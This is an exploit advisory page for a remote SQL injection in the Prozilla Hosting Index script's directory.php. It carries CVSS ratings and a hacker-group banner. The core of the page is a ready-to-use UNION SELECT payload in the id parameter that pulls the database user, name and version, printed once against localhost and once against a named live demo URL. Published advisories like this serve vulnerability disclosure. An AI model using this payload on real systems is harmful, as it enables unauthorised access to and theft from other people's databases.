Prozilla Hosting Index (id) Remote SQL Injection Vulnerability

2009.02.13
Credit: Snakespc
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================================================================================== = SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = = S N N N A A K K E S T E A A M M M M = + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + = S N N N A A K K E S T E A A M M M = = SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = ===================================================SNAKES TEAM==================================================== + = = Script:hostindex Remote SQL Injection Vulnerability + + = ==============================================:::ALGERIAN HaCkEr:::=============================================== = = = = = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = = = :::::Mail: snakespc@gmail.com::::::: = = = = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::= = = = = Script site: turnkeyzone.com "directory.php" = ===================================Snakespc====================================== Exploit: http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- ******** demo: http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- =================================================================================================================== Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: ALL www.Snakespc.com/SC >>>> Members Str0ke ....Milxw0rm ===================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top